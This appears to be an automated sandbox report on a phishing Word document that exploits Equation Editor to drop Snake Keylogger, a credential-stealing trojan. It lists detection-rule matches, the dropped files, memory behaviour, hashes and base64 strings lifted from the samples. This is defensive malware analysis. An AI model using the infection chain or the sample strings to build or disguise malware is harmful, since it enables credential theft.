          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 5.2.mpoom39002.scr.221190c.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
          Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Screenshot number: 4Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\mpoom39002.scrJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scrJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0033B8602_2_0033B860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0033C0C62_2_0033C0C6
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003414C82_2_003414C8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0034150D2_2_0034150D
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0033C1E42_2_0033C1E4
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 5_2_001E3D305_2_001E3D30
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F608D6_2_001F608D
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001FF1286_2_001FF128
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001FF9D86_2_001FF9D8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F51C16_2_001F51C1
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F79F96_2_001F79F9
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F6A386_2_001F6A38
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F5AB86_2_001F5AB8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F72F86_2_001F72F8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F3B306_2_001F3B30
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001FF5806_2_001FF580
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F65D96_2_001F65D9
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001FBDD96_2_001FBDD9
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F46106_2_001F4610
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F6E996_2_001F6E99
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001F61016_2_001F6101
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001FB5786_2_001FB578
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_001FB5686_2_001FB568
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FDC386_2_003FDC38
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F82286_2_003F8228
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F4A186_2_003F4A18
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F30086_2_003F3008
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F98086_2_003F9808
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F4E706_2_003F4E70
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F34606_2_003F3460
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F9C606_2_003F9C60
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F1A506_2_003F1A50
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F00406_2_003F0040
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FB2406_2_003FB240
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F38B86_2_003F38B8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F1EA86_2_003F1EA8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F86A86_2_003F86A8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F04986_2_003F0498
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FB6986_2_003FB698
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FE2806_2_003FE280
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F08F06_2_003F08F0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FBAF06_2_003FBAF0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F5CE06_2_003F5CE0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FA0E06_2_003FA0E0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FE8D06_2_003FE8D0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F74C86_2_003F74C8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FA5386_2_003FA538
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FEF206_2_003FEF20
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F3D106_2_003F3D10
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F23006_2_003F2300
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F8B006_2_003F8B00
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FF5706_2_003FF570
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F41686_2_003F4168
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F27586_2_003F2758
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F8F586_2_003F8F58
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FC9506_2_003FC950
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F0D486_2_003F0D48
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FBF486_2_003FBF48
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F2BB06_2_003F2BB0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F93B06_2_003F93B0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F11A06_2_003F11A0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FCFA06_2_003FCFA0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FA9906_2_003FA990
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F15F86_2_003F15F8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FD5F06_2_003FD5F0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FADE86_2_003FADE8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F67D06_2_003F67D0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F45C06_2_003F45C0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FB2306_2_003FB230
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FDC286_2_003FDC28
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F82196_2_003F8219
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F4A096_2_003F4A09
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F64586_2_003F6458
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F34516_2_003F3451
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F9C506_2_003F9C50
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F644A6_2_003F644A
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F1A406_2_003F1A40
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F38A86_2_003F38A8
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F1E986_2_003F1E98
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F86986_2_003F8698
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F048A6_2_003F048A
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FB6886_2_003FB688
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F22F06_2_003F22F0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F8AF06_2_003F8AF0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F08E06_2_003F08E0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F5CD26_2_003F5CD2
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FA0D16_2_003FA0D1
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F0D386_2_003F0D38
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FA52C6_2_003FA52C
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FEF116_2_003FEF11
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F3D0C6_2_003F3D0C
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F41586_2_003F4158
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F8F4C6_2_003F8F4C
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F27496_2_003F2749
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FC9406_2_003FC940
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F45B06_2_003F45B0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F2BA06_2_003F2BA0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F93A06_2_003F93A0
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F11926_2_003F1192
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FA9806_2_003FA980
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F2FF96_2_003F2FF9
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F97F96_2_003F97F9
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003F15EA6_2_003F15EA
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_003FADD96_2_003FADD9
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_005900406_2_00590040
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrCode function: 6_2_005906886_2_00590688
          Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 5.2.mpoom39002.scr.3253190.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 5.2.mpoom39002.scr.5f0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 5.2.mpoom39002.scr.221190c.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: mpoom[1].scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: mpoom39002.scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
          Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
          Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, ---.csBase64 encoded string: 'XXfgNbJ4cUyB+UHiB0C7jag8aawkdKKTNcpy851P8fBMaG9eLKQDE8LVCoqZKCl7'
          Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, ---.csBase64 encoded string: 'XXfgNbJ4cUyB+UHiB0C7jag8aawkdKKTNcpy851P8fBMaG9eLKQDE8LVCoqZKCl7'
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@7/10@3/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$THACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMutant created: NULL
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docReversingLabs: Detection: 42%
